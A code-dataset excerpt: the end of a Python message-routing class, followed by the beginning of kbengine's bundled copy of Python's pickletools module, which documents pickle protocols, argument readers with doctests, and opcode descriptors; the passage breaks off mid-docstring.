used to construct a class of that type.
* otherwise, dictionaries are visited recursively
* all other types are forbidden
"""
def make(x):
if isinstance(x, (list, str)):
return ActionList(x)
assert isinstance(x, dict)
if 'datatype' in x or 'typename' in x:
x = dict(default, **x)
return construct.construct_type(x, python_path)
return {k: make(v) for k, v in x.items()}
routing = flatten.unflatten(routing)
self.routing = make(routing)
def set_project(self, project):
"""Set the base project for routing."""
def visit(x):
# Try to set_project, then recurse through any values()
set_project = getattr(x, 'set_project', None)
if set_project:
set_project(project)
values = getattr(x, 'values', lambda: ())
for v in values():
visit(v)
visit(self.routing)
def receive(self, msg):
"""
Returns a (receiver, msg) pair, where receiver is `None` if no route for
the message was found, or otherwise an object with a `receive` method
that can accept that `msg`.
"""
x = self.routing
while not isinstance(x, ActionList):
if not x or not msg:
return None, msg
if not isinstance(x, dict):
raise ValueError('Unexpected type %s' % type(x))
_, value = msg.popitem(last=False)
x = x.get(str(value))
return x, msg
def __bool__(self):
return bool(self.routing)
def __str__(self):
return str(self.routing)
| mit |
zhjunlang/kbengine | kbe/res/scripts/common/Lib/pickletools.py | 74 | 91170 | '''"Executable documentation" for the pickle module.
Extensive comments about the pickle protocols and pickle-machine opcodes
can be found here. Some functions meant for external use:
genops(pickle)
Generate all the opcodes in a pickle, as (opcode, arg, position) triples.
dis(pickle, out=None, memo=None, indentlevel=4)
Print a symbolic disassembly of a pickle.
'''
import codecs
import io
import pickle
import re
import sys
__all__ = ['dis', 'genops', 'optimize']
bytes_types = pickle.bytes_types
# Other ideas:
#
# - A pickle verifier: read a pickle and check it exhaustively for
# well-formedness. dis() does a lot of this already.
#
# - A protocol identifier: examine a pickle and return its protocol number
# (== the highest .proto attr value among all the opcodes in the pickle).
# dis() already prints this info at the end.
#
# - A pickle optimizer: for example, tuple-building code is sometimes more
# elaborate than necessary, catering for the possibility that the tuple
# is recursive. Or lots of times a PUT is generated that's never accessed
# by a later GET.
# "A pickle" is a program for a virtual pickle machine (PM, but more accurately
# called an unpickling machine). It's a sequence of opcodes, interpreted by the
# PM, building an arbitrarily complex Python object.
#
# For the most part, the PM is very simple: there are no looping, testing, or
# conditional instructions, no arithmetic and no function calls. Opcodes are
# executed once each, from first to last, until a STOP opcode is reached.
#
# The PM has two data areas, "the stack" and "the memo".
#
# Many opcodes push Python objects onto the stack; e.g., INT pushes a Python
# integer object on the stack, whose value is gotten from a decimal string
# literal immediately following the INT opcode in the pickle bytestream. Other
# opcodes take Python objects off the stack. The result of unpickling is
# whatever object is left on the stack when the final STOP opcode is executed.
#
# The memo is simply an array of objects, or it can be implemented as a dict
# mapping little integers to objects. The memo serves as the PM's "long term
# memory", and the little integers indexing the memo are akin to variable
# names. Some opcodes pop a stack object into the memo at a given index,
# and others push a memo object at a given index onto the stack again.
#
# At heart, that's all the PM has. Subtleties arise for these reasons:
#
# + Object identity. Objects can be arbitrarily complex, and subobjects
# may be shared (for example, the list [a, a] refers to the same object a
# twice). It can be vital that unpickling recreate an isomorphic object
# graph, faithfully reproducing sharing.
#
# + Recursive objects. For example, after "L = []; L.append(L)", L is a
# list, and L[0] is the same list. This is related to the object identity
# point, and some sequences of pickle opcodes are subtle in order to
# get the right result in all cases.
#
# + Things pickle doesn't know everything about. Examples of things pickle
# does know everything about are Python's builtin scalar and container
# types, like ints and tuples. They generally have opcodes dedicated to
# them. For things like module references and instances of user-defined
# classes, pickle's knowledge is limited. Historically, many enhancements
# have been made to the pickle protocol in order to do a better (faster,
# and/or more compact) job on those.
#
# + Backward compatibility and micro-optimization. As explained below,
# pickle opcodes never go away, not even when better ways to do a thing
# get invented. The repertoire of the PM just keeps growing over time.
# For example, protocol 0 had two opcodes for building Python integers (INT
# and LONG), protocol 1 added three more for more-efficient pickling of short
# integers, and protocol 2 added two more for more-efficient pickling of
# long integers (before protocol 2, the only ways to pickle a Python long
# took time quadratic in the number of digits, for both pickling and
# unpickling). "Opcode bloat" isn't so much a subtlety as a source of
# wearying complication.
#
#
# Pickle protocols:
#
# For compatibility, the meaning of a pickle opcode never changes. Instead new
# pickle opcodes get added, and each version's unpickler can handle all the
# pickle opcodes in all protocol versions to date. So old pickles continue to
# be readable forever. The pickler can generally be told to restrict itself to
# the subset of opcodes available under previous protocol versions too, so that
# users can create pickles under the current version readable by older
# versions. However, a pickle does not contain its version number embedded
# within it. If an older unpickler tries to read a pickle using a later
# protocol, the result is most likely an exception due to seeing an unknown (in
# the older unpickler) opcode.
#
# The original pickle used what's now called "protocol 0", and what was called
# "text mode" before Python 2.3. The entire pickle bytestream is made up of
# printable 7-bit ASCII characters, plus the newline character, in protocol 0.
# That's why it was called text mode. Protocol 0 is small and elegant, but
# sometimes painfully inefficient.
#
# The second major set of additions is now called "protocol 1", and was called
# "binary mode" before Python 2.3. This added many opcodes with arguments
# consisting of arbitrary bytes, including NUL bytes and unprintable "high bit"
# bytes. Binary mode pickles can be substantially smaller than equivalent
# text mode pickles, and sometimes faster too; e.g., BININT represents a 4-byte
# int as 4 bytes following the opcode, which is cheaper to unpickle than the
# (perhaps) 11-character decimal string attached to INT. Protocol 1 also added
# a number of opcodes that operate on many stack elements at once (like APPENDS
# and SETITEMS), and "shortcut" opcodes (like EMPTY_DICT and EMPTY_TUPLE).
#
# The third major set of additions came in Python 2.3, and is called "protocol
# 2". This added:
#
# - A better way to pickle instances of new-style classes (NEWOBJ).
#
# - A way for a pickle to identify its protocol (PROTO).
#
# - Time- and space- efficient pickling of long ints (LONG{1,4}).
#
# - Shortcuts for small tuples (TUPLE{1,2,3}}.
#
# - Dedicated opcodes for bools (NEWTRUE, NEWFALSE).
#
# - The "extension registry", a vector of popular objects that can be pushed
# efficiently by index (EXT{1,2,4}). This is akin to the memo and GET, but
# the registry contents are predefined (there's nothing akin to the memo's
# PUT).
#
# Another independent change with Python 2.3 is the abandonment of any
# pretense that it might be safe to load pickles received from untrusted
# parties -- no sufficient security analysis has been done to guarantee
# this and there isn't a use case that warrants the expense of such an
# analysis.
#
# To this end, all tests for __safe_for_unpickling__ or for
# copyreg.safe_constructors are removed from the unpickling code.
# References to these variables in the descriptions below are to be seen
# as describing unpickling in Python 2.2 and before.
# Meta-rule: Descriptions are stored in instances of descriptor objects,
# with plain constructors. No meta-language is defined from which
# descriptors could be constructed. If you want, e.g., XML, write a little
# program to generate XML from the objects.
##############################################################################
# Some pickle opcodes have an argument, following the opcode in the
# bytestream. An argument is of a specific type, described by an instance
# of ArgumentDescriptor. These are not to be confused with arguments taken
# off the stack -- ArgumentDescriptor applies only to arguments embedded in
# the opcode stream, immediately following an opcode.
# Represents the number of bytes consumed by an argument delimited by the
# next newline character.
UP_TO_NEWLINE = -1
# Represents the number of bytes consumed by a two-argument opcode where
# the first argument gives the number of bytes in the second argument.
TAKEN_FROM_ARGUMENT1 = -2 # num bytes is 1-byte unsigned int
TAKEN_FROM_ARGUMENT4 = -3 # num bytes is 4-byte signed little-endian int
TAKEN_FROM_ARGUMENT4U = -4 # num bytes is 4-byte unsigned little-endian int
TAKEN_FROM_ARGUMENT8U = -5 # num bytes is 8-byte unsigned little-endian int
class ArgumentDescriptor(object):
__slots__ = (
# name of descriptor record, also a module global name; a string
'name',
# length of argument, in bytes; an int; UP_TO_NEWLINE and
# TAKEN_FROM_ARGUMENT{1,4,8} are negative values for variable-length
# cases
'n',
# a function taking a file-like object, reading this kind of argument
# from the object at the current position, advancing the current
# position by n bytes, and returning the value of the argument
'reader',
# human-readable docs for this arg descriptor; a string
'doc',
)
def __init__(self, name, n, reader, doc):
assert isinstance(name, str)
self.name = name
assert isinstance(n, int) and (n >= 0 or
n in (UP_TO_NEWLINE,
TAKEN_FROM_ARGUMENT1,
TAKEN_FROM_ARGUMENT4,
TAKEN_FROM_ARGUMENT4U,
TAKEN_FROM_ARGUMENT8U))
self.n = n
self.reader = reader
assert isinstance(doc, str)
self.doc = doc
from struct import unpack as _unpack
def read_uint1(f):
r"""
>>> import io
>>> read_uint1(io.BytesIO(b'\xff'))
255
"""
data = f.read(1)
if data:
return data[0]
raise ValueError("not enough data in stream to read uint1")
uint1 = ArgumentDescriptor(
name='uint1',
n=1,
reader=read_uint1,
doc="One-byte unsigned integer.")
def read_uint2(f):
r"""
>>> import io
>>> read_uint2(io.BytesIO(b'\xff\x00'))
255
>>> read_uint2(io.BytesIO(b'\xff\xff'))
65535
"""
data = f.read(2)
if len(data) == 2:
return _unpack("<H", data)[0]
raise ValueError("not enough data in stream to read uint2")
uint2 = ArgumentDescriptor(
name='uint2',
n=2,
reader=read_uint2,
doc="Two-byte unsigned integer, little-endian.")
def read_int4(f):
r"""
>>> import io
>>> read_int4(io.BytesIO(b'\xff\x00\x00\x00'))
255
>>> read_int4(io.BytesIO(b'\x00\x00\x00\x80')) == -(2**31)
True
"""
data = f.read(4)
if len(data) == 4:
return _unpack("<i", data)[0]
raise ValueError("not enough data in stream to read int4")
int4 = ArgumentDescriptor(
name='int4',
n=4,
reader=read_int4,
doc="Four-byte signed integer, little-endian, 2's complement.")
def read_uint4(f):
r"""
>>> import io
>>> read_uint4(io.BytesIO(b'\xff\x00\x00\x00'))
255
>>> read_uint4(io.BytesIO(b'\x00\x00\x00\x80')) == 2**31
True
"""
data = f.read(4)
if len(data) == 4:
return _unpack("<I", data)[0]
raise ValueError("not enough data in stream to read uint4")
uint4 = ArgumentDescriptor(
name='uint4',
n=4,
reader=read_uint4,
doc="Four-byte unsigned integer, little-endian.")
def read_uint8(f):
r"""
>>> import io
>>> read_uint8(io.BytesIO(b'\xff\x00\x00\x00\x00\x00\x00\x00'))
255
>>> read_uint8(io.BytesIO(b'\xff' * 8)) == 2**64-1
True
"""
data = f.read(8)
if len(data) == 8:
return _unpack("<Q", data)[0]
raise ValueError("not enough data in stream to read uint8")
uint8 = ArgumentDescriptor(
name='uint8',
n=8,
reader=read_uint8,
doc="Eight-byte unsigned integer, little-endian.")
def read_stringnl(f, decode=True, stripquotes=True):
r"""
>>> import io
>>> read_stringnl(io.BytesIO(b"'abcd'\nefg\n"))
'abcd'
>>> read_stringnl(io.BytesIO(b"\n"))
Traceback (most recent call last):
...
ValueError: no string quotes around b''
>>> read_stringnl(io.BytesIO(b"\n"), stripquotes=False)
''
>>> read_stringnl(io.BytesIO(b"''\n"))
''
>>> read_stringnl(io.BytesIO(b'"abcd"'))
Traceback (most recent call last):
...
ValueError: no newline found when trying to read stringnl
Embedded escapes are undone in the result.
>>> read_stringnl(io.BytesIO(br"'a\n\\b\x00c\td'" + b"\n'e'"))
'a\n\\b\x00c\td'
"""
data = f.readline()
if not data.endswith(b'\n'):
raise ValueError("no newline found when trying to read stringnl")
data = data[:-1] # lose the newline
if stripquotes:
for q in (b'"', b"'"):
if data.startswith(q):
if not data.endswith(q):
raise ValueError("strinq quote %r not found at both "
"ends of %r" % (q, data))
data = data[1:-1]
break
else:
raise ValueError("no string quotes around %r" % data)
if decode:
data = codecs.escape_decode(data)[0].decode("ascii")
return data
stringnl = ArgumentDescriptor(
name='stringnl',
n=UP_TO_NEWLINE,
reader=read_stringnl,
doc="""A newline-terminated string.
This is a repr-style string, with embedded escapes, and
bracketing quotes.
""")
def read_stringnl_noescape(f):
return read_stringnl(f, stripquotes=False)
stringnl_noescape = ArgumentDescriptor(
name='stringnl_noescape',
n=UP_TO_NEWLINE,
reader=read_stringnl_noescape,
doc="""A newline-terminated string.
This is a str-style string, without embedded escapes,
or bracketing quotes. It should consist solely of
printable ASCII characters.
""")
def read_stringnl_noescape_pair(f):
r"""
>>> import io
>>> read_stringnl_noescape_pair(io.BytesIO(b"Queue\nEmpty\njunk"))
'Queue Empty'
"""
return "%s %s" % (read_stringnl_noescape(f), read_stringnl_noescape(f))
stringnl_noescape_pair = ArgumentDescriptor(
name='stringnl_noescape_pair',
n=UP_TO_NEWLINE,
reader=read_stringnl_noescape_pair,
doc="""A pair of newline-terminated strings.
These are str-style strings, without embedded
escapes, or bracketing quotes. They should
consist solely of printable ASCII characters.
The pair is returned as a single string, with
a single blank separating the two strings.
""")
def read_string1(f):
r"""
>>> import io
>>> read_string1(io.BytesIO(b"\x00"))
''
>>> read_string1(io.BytesIO(b"\x03abcdef"))
'abc'
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return data.decode("latin-1")
raise ValueError("expected %d bytes in a string1, but only %d remain" %
(n, len(data)))
string1 = ArgumentDescriptor(
name="string1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_string1,
doc="""A counted string.
The first argument is a 1-byte unsigned int giving the number
of bytes in the string, and the second argument is that many
bytes.
""")
def read_string4(f):
r"""
>>> import io
>>> read_string4(io.BytesIO(b"\x00\x00\x00\x00abc"))
''
>>> read_string4(io.BytesIO(b"\x03\x00\x00\x00abcdef"))
'abc'
>>> read_string4(io.BytesIO(b"\x00\x00\x00\x03abcdef"))
Traceback (most recent call last):
...
ValueError: expected 50331648 bytes in a string4, but only 6 remain
"""
n = read_int4(f)
if n < 0:
raise ValueError("string4 byte count < 0: %d" % n)
data = f.read(n)
if len(data) == n:
return data.decode("latin-1")
raise ValueError("expected %d bytes in a string4, but only %d remain" %
(n, len(data)))
string4 = ArgumentDescriptor(
name="string4",
n=TAKEN_FROM_ARGUMENT4,
reader=read_string4,
doc="""A counted string.
The first argument is a 4-byte little-endian signed int giving
the number of bytes in the string, and the second argument is
that many bytes.
""")
def read_bytes1(f):
r"""
>>> import io
>>> read_bytes1(io.BytesIO(b"\x00"))
b''
>>> read_bytes1(io.BytesIO(b"\x03abcdef"))
b'abc'
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes1, but only %d remain" %
(n, len(data)))
bytes1 = ArgumentDescriptor(
name="bytes1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_bytes1,
doc="""A counted bytes string.
The first argument is a 1-byte unsigned int giving the number
of bytes in the string, and the second argument is that many
bytes.
""")
def read_bytes1(f):
r"""
>>> import io
>>> read_bytes1(io.BytesIO(b"\x00"))
b''
>>> read_bytes1(io.BytesIO(b"\x03abcdef"))
b'abc'
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes1, but only %d remain" %
(n, len(data)))
bytes1 = ArgumentDescriptor(
name="bytes1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_bytes1,
doc="""A counted bytes string.
The first argument is a 1-byte unsigned int giving the number
of bytes, and the second argument is that many bytes.
""")
def read_bytes4(f):
r"""
>>> import io
>>> read_bytes4(io.BytesIO(b"\x00\x00\x00\x00abc"))
b''
>>> read_bytes4(io.BytesIO(b"\x03\x00\x00\x00abcdef"))
b'abc'
>>> read_bytes4(io.BytesIO(b"\x00\x00\x00\x03abcdef"))
Traceback (most recent call last):
...
ValueError: expected 50331648 bytes in a bytes4, but only 6 remain
"""
n = read_uint4(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("bytes4 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes4, but only %d remain" %
(n, len(data)))
bytes4 = ArgumentDescriptor(
name="bytes4",
n=TAKEN_FROM_ARGUMENT4U,
reader=read_bytes4,
doc="""A counted bytes string.
The first argument is a 4-byte little-endian unsigned int giving
the number of bytes, and the second argument is that many bytes.
""")
def read_bytes8(f):
r"""
>>> import io, struct, sys
>>> read_bytes8(io.BytesIO(b"\x00\x00\x00\x00\x00\x00\x00\x00abc"))
b''
>>> read_bytes8(io.BytesIO(b"\x03\x00\x00\x00\x00\x00\x00\x00abcdef"))
b'abc'
>>> bigsize8 = struct.pack("<Q", sys.maxsize//3)
>>> read_bytes8(io.BytesIO(bigsize8 + b"abcdef")) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: expected ... bytes in a bytes8, but only 6 remain
"""
n = read_uint8(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("bytes8 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes8, but only %d remain" %
(n, len(data)))
bytes8 = ArgumentDescriptor(
name="bytes8",
n=TAKEN_FROM_ARGUMENT8U,
reader=read_bytes8,
doc="""A counted bytes string.
The first argument is a 8-byte little-endian unsigned int giving
the number of bytes, and the second argument is that many bytes.
""")
def read_unicodestringnl(f):
r"""
>>> import io
>>> read_unicodestringnl(io.BytesIO(b"abc\\uabcd\njunk")) == 'abc\uabcd'
True
"""
data = f.readline()
if not data.endswith(b'\n'):
raise ValueError("no newline found when trying to read "
"unicodestringnl")
data = data[:-1] # lose the newline
return str(data, 'raw-unicode-escape')
unicodestringnl = ArgumentDescriptor(
name='unicodestringnl',
n=UP_TO_NEWLINE,
reader=read_unicodestringnl,
doc="""A newline-terminated Unicode string.
This is raw-unicode-escape encoded, so consists of
printable ASCII characters, and may contain embedded
escape sequences.
""")
def read_unicodestring1(f):
r"""
>>> import io
>>> s = 'abcd\uabcd'
>>> enc = s.encode('utf-8')
>>> enc
b'abcd\xea\xaf\x8d'
>>> n = bytes([len(enc)]) # little-endian 1-byte length
>>> t = read_unicodestring1(io.BytesIO(n + enc + b'junk'))
>>> s == t
True
>>> read_unicodestring1(io.BytesIO(n + enc[:-1]))
Traceback (most recent call last):
...
ValueError: expected 7 bytes in a unicodestring1, but only 6 remain
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return str(data, 'utf-8', 'surrogatepass')
raise ValueError("expected %d bytes in a unicodestring1, but only %d "
"remain" % (n, len(data)))
unicodestring1 = ArgumentDescriptor(
name="unicodestring1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_unicodestring1,
doc="""A counted Unicode string.
The first argument is a 1-byte little-endian signed int
giving the number of bytes in the string, and the second
argument-- the UTF-8 encoding of the Unicode string --
contains that many bytes.
""")
def read_unicodestring4(f):
r"""
>>> import io
>>> s = 'abcd\uabcd'
>>> enc = s.encode('utf-8')
>>> enc
b'abcd\xea\xaf\x8d'
>>> n = bytes([len(enc), 0, 0, 0]) # little-endian 4-byte length
>>> t = read_unicodestring4(io.BytesIO(n + enc + b'junk'))
>>> s == t
True
>>> read_unicodestring4(io.BytesIO(n + enc[:-1]))
Traceback (most recent call last):
...
ValueError: expected 7 bytes in a unicodestring4, but only 6 remain
"""
n = read_uint4(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("unicodestring4 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return str(data, 'utf-8', 'surrogatepass')
raise ValueError("expected %d bytes in a unicodestring4, but only %d "
"remain" % (n, len(data)))
unicodestring4 = ArgumentDescriptor(
name="unicodestring4",
n=TAKEN_FROM_ARGUMENT4U,
reader=read_unicodestring4,
doc="""A counted Unicode string.
The first argument is a 4-byte little-endian signed int
giving the number of bytes in the string, and the second
argument-- the UTF-8 encoding of the Unicode string --
contains that many bytes.
""")
def read_unicodestring8(f):
r"""
>>> import io
>>> s = 'abcd\uabcd'
>>> enc = s.encode('utf-8')
>>> enc
b'abcd\xea\xaf\x8d'
>>> n = bytes([len(enc)]) + bytes(7) # little-endian 8-byte length
>>> t = read_unicodestring8(io.BytesIO(n + enc + b'junk'))
>>> s == t
True
>>> read_unicodestring8(io.BytesIO(n + enc[:-1]))
Traceback (most recent call last):
...
ValueError: expected 7 bytes in a unicodestring8, but only 6 remain
"""
n = read_uint8(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("unicodestring8 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return str(data, 'utf-8', 'surrogatepass')
raise ValueError("expected %d bytes in a unicodestring8, but only %d "
"remain" % (n, len(data)))
unicodestring8 = ArgumentDescriptor(
name="unicodestring8",
n=TAKEN_FROM_ARGUMENT8U,
reader=read_unicodestring8,
doc="""A counted Unicode string.
The first argument is a 8-byte little-endian signed int
giving the number of bytes in the string, and the second
argument-- the UTF-8 encoding of the Unicode string --
contains that many bytes.
""")
def read_decimalnl_short(f):
r"""
>>> import io
>>> read_decimalnl_short(io.BytesIO(b"1234\n56"))
1234
>>> read_decimalnl_short(io.BytesIO(b"1234L\n56"))
Traceback (most recent call last):
...
ValueError: invalid literal for int() with base 10: b'1234L'
"""
s = read_stringnl(f, decode=False, stripquotes=False)
# There's a hack for True and False here.
if s == b"00":
return False
elif s == b"01":
return True
return int(s)
def read_decimalnl_long(f):
r"""
>>> import io
>>> read_decimalnl_long(io.BytesIO(b"1234L\n56"))
1234
>>> read_decimalnl_long(io.BytesIO(b"123456789012345678901234L\n6"))
123456789012345678901234
"""
s = read_stringnl(f, decode=False, stripquotes=False)
if s[-1:] == b'L':
s = s[:-1]
return int(s)
decimalnl_short = ArgumentDescriptor(
name='decimalnl_short',
n=UP_TO_NEWLINE,
reader=read_decimalnl_short,
doc="""A newline-terminated decimal integer literal.
This never has a trailing 'L', and the integer fit
in a short Python int on the box where the pickle
was written -- but there's no guarantee it will fit
in a short Python int on the box where the pickle
is read.
""")
decimalnl_long = ArgumentDescriptor(
name='decimalnl_long',
n=UP_TO_NEWLINE,
reader=read_decimalnl_long,
doc="""A newline-terminated decimal integer literal.
This has a trailing 'L', and can represent integers
of any size.
""")
def read_floatnl(f):
r"""
>>> import io
>>> read_floatnl(io.BytesIO(b"-1.25\n6"))
-1.25
"""
s = read_stringnl(f, decode=False, stripquotes=False)
return float(s)
floatnl = ArgumentDescriptor(
name='floatnl',
n=UP_TO_NEWLINE,
reader=read_floatnl,
doc="""A newline-terminated decimal floating literal.
In general this requires 17 significant digits for roundtrip
identity, and pickling then unpickling infinities, NaNs, and
minus zero doesn't work across boxes, or on some boxes even
on itself (e.g., Windows can't read the strings it produces
for infinities or NaNs).
""")
def read_float8(f):
r"""
>>> import io, struct
>>> raw = struct.pack(">d", -1.25)
>>> raw
b'\xbf\xf4\x00\x00\x00\x00\x00\x00'
>>> read_float8(io.BytesIO(raw + b"\n"))
-1.25
"""
data = f.read(8)
if len(data) == 8:
return _unpack(">d", data)[0]
raise ValueError("not enough data in stream to read float8")
float8 = ArgumentDescriptor(
name='float8',
n=8,
reader=read_float8,
doc="""An 8-byte binary representation of a float, big-endian.
The format is unique to Python, and shared with the struct
module (format string '>d') "in theory" (the struct and pickle
implementations don't share the code -- they should). It's
strongly related to the IEEE-754 double format, and, in normal
cases, is in fact identical to the big-endian 754 double format.
On other boxes the dynamic range is limited to that of a 754
double, and "add a half and chop" rounding is used to reduce
the precision to 53 bits. However, even on a 754 box,
infinities, NaNs, and minus zero may not be handled correctly
(may not survive roundtrip pickling intact).
""")
# Protocol 2 formats
from pickle import decode_long
def read_long1(f):
r"""
>>> import io
>>> read_long1(io.BytesIO(b"\x00"))
0
>>> read_long1(io.BytesIO(b"\x02\xff\x00"))
255
>>> read_long1(io.BytesIO(b"\x02\xff\x7f"))
32767
>>> read_long1(io.BytesIO(b"\x02\x00\xff"))
-256
>>> read_long1(io.BytesIO(b"\x02\x00\x80"))
-32768
"""
n = read_uint1(f)
data = f.read(n)
if len(data) != n:
raise ValueError("not enough data in stream to read long1")
return decode_long(data)
long1 = ArgumentDescriptor(
name="long1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_long1,
doc="""A binary long, little-endian, using 1-byte size.
This first reads one byte as an unsigned size, then reads that
many bytes and interprets them as a little-endian 2's-complement long.
If the size is 0, that's taken as a shortcut for the long 0L.
""")
def read_long4(f):
r"""
>>> import io
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\xff\x00"))
255
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\xff\x7f"))
32767
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\x00\xff"))
-256
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\x00\x80"))
-32768
>>> read_long1(io.BytesIO(b"\x00\x00\x00\x00"))
0
"""
n = read_int4(f)
if n < 0:
raise ValueError("long4 byte count < 0: %d" % n)
data = f.read(n)
if len(data) != n:
raise ValueError("not enough data in stream to read long4")
return decode_long(data)
long4 = ArgumentDescriptor(
name="long4",
n=TAKEN_FROM_ARGUMENT4,
reader=read_long4,
doc="""A binary representation of a long, little-endian.
This first reads four bytes as a signed size (but requires the
size to be >= 0), then reads that many bytes and interprets them
as a little-endian 2's-complement long. If the size is 0, that's taken
as a shortcut for the int 0, although LONG1 should really be used
then instead (and in any case where # of bytes < 256).
""")
##############################################################################
# Object descriptors. The stack used by the pickle machine holds objects,
# and in the stack_before and stack_after attributes of OpcodeInfo
# descriptors we need names to describe the various types of objects that can
# appear on the stack.
class StackObject(object):
__slots__ = (
# name of descriptor record, for info only
'name',
# type of object, or tuple of type objects (meaning the object can
# be of any type in the tuple)
'obtype',
# human-readable docs for this kind of stack object; a string
'doc',
)
def __init__(self, name, obtype, doc):
assert isinstance(name, str)
self.name = name
assert isinstance(obtype, type) or isinstance(obtype, tuple)
if isinstance(obtype, tuple):
for contained in obtype:
assert isinstance(contained, type)
self.obtype = obtype
assert isinstance(doc, str)
self.doc = doc
def __repr__(self):
return self.name
pyint = pylong = StackObject(
name='int',
obtype=int,
doc="A Python integer object.")
pyinteger_or_bool = StackObject(
name='int_or_bool',
obtype=(int, bool),
doc="A Python integer or boolean object.")
pybool = StackObject(
name='bool',
obtype=bool,
doc="A Python boolean object.")
pyfloat = StackObject(
name='float',
obtype=float,
doc="A Python float object.")
pybytes_or_str = pystring = StackObject(
name='bytes_or_str',
obtype=(bytes, str),
doc="A Python bytes or (Unicode) string object.")
pybytes = StackObject(
name='bytes',
obtype=bytes,
doc="A Python bytes object.")
pyunicode = StackObject(
name='str',
obtype=str,
doc="A Python (Unicode) string object.")
pynone = StackObject(
name="None",
obtype=type(None),
doc="The Python None object.")
pytuple = StackObject(
name="tuple",
obtype=tuple,
doc="A Python tuple object.")
pylist = StackObject(
name="list",
obtype=list,
doc="A Python list object.")
pydict = StackObject(
name="dict",
obtype=dict,
doc="A Python dict object.")
pyset = StackObject(
name="set",
obtype=set,
doc="A Python set object.")
pyfrozenset = StackObject(
name="frozenset",
obtype=set,
doc="A Python frozenset object.")
anyobject = StackObject(
name='any',
obtype=object,
doc="Any kind of object whatsoever.")
markobject = StackObject(
name="mark",
obtype=StackObject,
doc="""'The mark' is a unique object.
Opcodes that operate on a variable number of objects
generally don't embed the count of objects in the opcode,
or pull it off the stack. Instead the MARK opcode is used
to push a special marker object on the stack, and then
some other opcodes grab all the objects from the top of
the stack down to (but not including) the topmost marker
object.
""")
stackslice = StackObject(
name="stackslice",
obtype=StackObject,
doc="""An object representing a contiguous slice of the stack.
This is used in conjunction with markobject, to represent all
of the stack following the topmost markobject. For example,
the POP_MARK opcode changes the stack from
[..., markobject, stackslice]
to
[...]
No matter how many object are on the stack after the topmost
markobject, POP_MARK gets rid of all of them (including the
topmost markobject too).
""")
##############################################################################
# Descriptors for pickle opcodes.
class OpcodeInfo(object):
__slots__ = (
# symbolic name of opcode; a string
'name',
# the code used in a bytestream to represent the opcode; a
# one-character string
'code',
# If the opcode has an argument embedded in the byte string, an
# instance of ArgumentDescriptor specifying its type. Note that
# arg.reader(s) can be used to read and decode the argument from
# the bytestream s, and arg.doc documents the format of the raw
# argument bytes. If the opcode doesn't have an argument embedded
# in the bytestream, arg should be None.
'arg',
# what the stack looks like before this opcode runs; a list
'stack_before',
# what the stack looks like after this opcode runs; a list
'stack_after',
# the protocol number in which this opcode was introduced; an int
'proto',
# human-readable docs for this opcode; a string
'doc',
)
def __init__(self, name, code, arg,
stack_before, stack_after, proto, doc):
assert isinstance(name, str)
self.name = name
assert isinstance(code, str)
assert len(code) == 1
self.code = code
assert arg is None or isinstance(arg, ArgumentDescriptor)
self.arg = arg
assert isinstance(stack_before, list)
for x in stack_before:
assert isinstance(x, StackObject)
self.stack_before = stack_before
assert isinstance(stack_after, list)
for x in stack_after:
assert isinstance(x, StackObject)
self.stack_after = stack_after
assert isinstance(proto, int) and 0 <= proto <= pickle.HIGHEST_PROTOCOL
self.proto = proto
assert isinstance(doc, str)
self.doc = doc
I = OpcodeInfo
opcodes = [
# Ways to spell integers.
I(name='INT',
code='I',
arg=decimalnl_short,
stack_before=[],
stack_after=[pyinteger_or_bool],
proto=0,
doc="""Push an integer or bool.
The argument is a newline-terminated decimal literal string.
The intent may have been that this always fit in a short Python int,
but INT can be generated in pickles written on a 64-bit box that
require a Python long on a 32-bit box. The difference between this
and LONG then is that INT skips a trailing 'L', and produces a short
int whenever possible.
Another difference is due to that, when bool was introduced as a
distinct type in 2.3, builtin names True and False were also added to
2.2.2, mapping to ints 1 and 0. For compatibility in both directions,
True gets pickled as INT + "I01\\n", and False as INT + "I00\\n".
Leading zeroes are never produced for a genuine integer. The 2.3
(and later) unpicklers special-case these and return bool instead;
earlier unpicklers ignore the leading "0" and return the int.
"""),
I(name='BININT',
code='J',
arg=int4,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a four-byte signed integer.
This handles the full range of Python (short) integers on a 32-bit
box, directly as binary bytes (1 for the opcode and 4 for the integer).
If the integer is non-negative and fits in 1 or 2 bytes, pickling via
BININT1 or BININT2 saves space.
"""),
I(name='BININT1',
code='K',
arg=uint1,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a one-byte unsigned integer.
This is a space optimization for pickling very small non-negative ints,
in range(256).
"""),
I(name='BININT2',
code='M',
arg=uint2,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a two-byte unsigned integer.
This is a space optimization for pickling small positive ints, in
range(256, 2**16). Integers in range(256) can also be pickled via
BININT2, but BININT1 instead saves a byte.
"""),
I(name='LONG',
code='L',
arg=decimalnl_long,
stack_before=[],
stack_after=[pyint],
proto=0,
doc="""Push a long integer.
The same as INT, except that the literal ends with 'L', and always
